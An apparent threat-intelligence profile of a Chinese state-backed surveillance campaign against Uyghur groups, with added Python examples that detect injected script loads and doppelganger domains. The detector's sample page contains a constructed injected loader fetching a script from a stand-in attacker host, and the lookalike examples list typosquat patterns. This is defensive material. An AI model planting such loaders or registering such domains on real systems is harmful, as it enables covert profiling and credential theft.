Cyber Incident Victim: World Uyghurs Writers Union
Date:
Sep 2015
Location:
China
Summary
Chinese state-sponsored actors ran a multi-year cyber campaign against Uyghur individuals and organizations, built on compromised community websites and attacker-controlled infrastructure. Visitors to the compromised sites were profiled with the Scanbox framework, Android users were served 64-bit ARM malware, and Gmail accounts were taken over by abusing Google OAuth authorization. The operations used doppelganger domains that mimicked legitimate services and involved at least two intrusion sets, supporting data theft, physical tracking and persistent monitoring of the diaspora community.
| CIA Posture | Motives | Tactics, Techniques & Procedures |
|---|---|---|
| Available to members | 3 motives | 1 technique |
| Threat Actor | Type | Location |
|---|---|---|
| 1 actor | Available to members | Available to members |
Description
Between 2013 and 2019, Chinese state-sponsored advanced persistent threat (APT) groups conducted extensive cyber surveillance and exploitation campaigns against the Uyghur diaspora and affiliated organizations. The attackers compromised at least 11 Uyghur and East Turkistan-related websites and injected unauthorized JavaScript that loaded the Scanbox framework. Scanbox profiled each visitor's system, collected data such as usernames and installed software, and served as a staging point for delivering further exploits. In parallel, the attackers used the compromised sites to distribute malicious 64-bit ARM executables to Android users, giving them surveillance capability on those devices.
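The injection pattern described above (a compromised site made to load a third-party profiling script) is something a site owner can check for. The following is an added example, not code from the page, from Volexity or from the campaign: a Python check that parses a page and flags script loads whose host is neither the page itself nor on an allowlist, covering both static `<script src>` tags and the inline "create a script element and point its .src off-site" loader shape. The host names, the allowlist and the sample HTML are constructed for the example.

```python
"""Flag script loads a page should not be making, the shape of the injection
used to plant a visitor-profiling framework on a compromised site.
Added example: not code from the page or from Volexity. All host names,
the allowlist and the sample HTML below are constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this site legitimately loads scripts from (assumption for the example).
ALLOWED_SCRIPT_HOSTS = {"cdn.example-uyghur-site.org"}

# Inline loader shape: an element's .src is pointed at an off-site URL.
_DYNAMIC_SRC = re.compile(r"""\.src\s*=\s*['"](?:https?:)?//([^/'"\s]+)""", re.I)


class ScriptCollector(HTMLParser):
    """Collect <script src=...> targets and inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.external = []      # src attribute values
        self.inline = []        # bodies of inline script blocks
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def find_foreign_scripts(html, page_host, allowed=ALLOWED_SCRIPT_HOSTS):
    """Return (kind, host) for every script load from a host that is neither
    the page's own host nor on the allowlist.

    kind is "static" for <script src> tags and "dynamic" for inline code that
    assigns an off-site URL to a script element's .src.
    """
    collector = ScriptCollector()
    collector.feed(html)
    page_host = page_host.lower()
    findings = []
    for src in collector.external:
        host = urlparse(src).hostname       # None for same-origin relative paths
        if host and host != page_host and host not in allowed:
            findings.append(("static", host))
    for body in collector.inline:
        for match in _DYNAMIC_SRC.finditer(body):
            host = match.group(1).lower()
            if host != page_host and host not in allowed:
                findings.append(("dynamic", host))
    return findings


# Constructed page: one same-origin script, one allowlisted CDN script, and an
# injected inline loader pulling a profiling script from an attacker host.
SAMPLE_PAGE = """<html><head>
<script src="/js/site.js"></script>
<script src="https://cdn.example-uyghur-site.org/jquery.min.js"></script>
<script>
  var s = document.createElement('script');
  s.src = 'https://stats-collector.example/i/js.js';
  document.head.appendChild(s);
</script>
</head><body><p>News</p></body></html>"""

if __name__ == "__main__":
    for kind, host in find_foreign_scripts(SAMPLE_PAGE, "www.example-uyghur-site.org"):
        print(f"{kind:7} script load from {host}")
```

Run against a saved copy of each public page, or against the served HTML fetched from outside the organization, since an injection is often only visible in what the server actually returns. The allowlist is the important input: every host on it is one whose compromise would give an attacker the same foothold.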

The campaigns also used doppelganger domains mimicking Google, the Turkistan Times and the Uyghur Academy to trick targets into entering credentials. The attackers abused Google OAuth to gain access to victims' Gmail accounts and contact lists, and the harvested contacts widened the pool of targets. Volexity identified infrastructure overlaps suggesting possible links to the iPhone-focused attacks against Uyghurs. At least two distinct Chinese APT groups coordinated these operations, using the compromised websites as strategic attack platforms. The result was persistent monitoring of Uyghur activists' communications, movements and organizational networks, intensifying digital repression alongside the physical detention campaigns in Xinjiang. Volexity's analysis documented attacker infrastructure, network signatures and exploitation patterns but did not describe specific mitigation actions taken by the affected organizations.
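Doppelganger domains of the kind described above can be screened for in new-registration feeds or in proxy and mail logs. The following is an added example, not code from the page or from Volexity, and it does not reproduce the campaign's actual domains: a Python classifier that takes a list of legitimate domains and labels a candidate as a lookalike by the common construction patterns (brand used as a subdomain of an unrelated domain, TLD swap, confusable characters or inserted hyphens, brand embedded in a longer label, and small typos). The legitimate domains for the Turkistan Times and the Uyghur Academy and every candidate are constructed for the example.

```python
"""Flag domains that imitate a set of legitimate ones (doppelganger /
lookalike registrations).  Added example: not code from the page or from
Volexity.  The legitimate domains and every candidate are constructed; the
real campaign's domains are not reproduced here."""
from difflib import SequenceMatcher

# Brands the text says were imitated (Google, Turkistan Times, Uyghur Academy);
# the domains themselves are assumptions for the example.
LEGIT_DOMAINS = ("google.com", "turkistantimes.example", "uyghuracademy.example")

# Confusable substitutions commonly used in lookalike registrations.
CONFUSABLES = {"0": "o", "1": "l", "3": "e", "5": "s", "rn": "m", "vv": "w"}


def _split(domain):
    """Return (name, tld) from the last two labels. Real use needs a
    public-suffix list (e.g. .co.uk); kept simple here."""
    labels = domain.lower().rstrip(".").split(".")
    return (labels[-2], labels[-1]) if len(labels) >= 2 else (labels[0], labels[0])


def _normalize(name):
    """Undo confusable substitutions and drop hyphens before comparing."""
    for src, dst in CONFUSABLES.items():
        name = name.replace(src, dst)
    return name.replace("-", "")


def classify_lookalike(candidate, legit=LEGIT_DOMAINS):
    """Return (reason, imitated_domain) for a lookalike, or None if the
    candidate is a legitimate domain, a subdomain of one, or unrelated."""
    candidate = candidate.lower().rstrip(".")
    if any(candidate == real or candidate.endswith("." + real) for real in legit):
        return None
    cand_name, cand_tld = _split(candidate)
    subdomain_labels = candidate.split(".")[:-2]
    for real in legit:
        real_name, real_tld = _split(real)
        if real_name in subdomain_labels:
            return ("brand-as-subdomain", real)    # google.com.evil.example
        if cand_name == real_name and cand_tld != real_tld:
            return ("tld-swap", real)              # turkistantimes.net
        if _normalize(cand_name) == real_name:
            return ("confusable", real)            # g00gle.com, turkistan-times.example
        if real_name in cand_name:
            return ("brand-embedded", real)        # accounts-google.example
        if SequenceMatcher(None, cand_name, real_name).ratio() >= 0.85:
            return ("typosquat", real)             # uyghuracadmey.example
    return None


# Constructed candidates, as they might arrive from a registration feed.
SUSPECT_DOMAINS = [
    "mail.google.com",
    "google.com.evil.example",
    "turkistantimes.net",
    "g00gle.com",
    "accounts-google.example",
    "uyghuracadmey.example",
    "news.example",
]

if __name__ == "__main__":
    for domain in SUSPECT_DOMAINS:
        verdict = classify_lookalike(domain)
        print(f"{domain:28} {verdict[0] + ' of ' + verdict[1] if verdict else 'no match'}")
```

The ordering of the checks matters: the exact and subdomain test runs first so that legitimate infrastructure is never flagged, and the cheap structural tests run before the fuzzy ratio. The 0.85 threshold and the confusables table are tuning points; short brand names will need a tighter threshold to avoid false positives.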
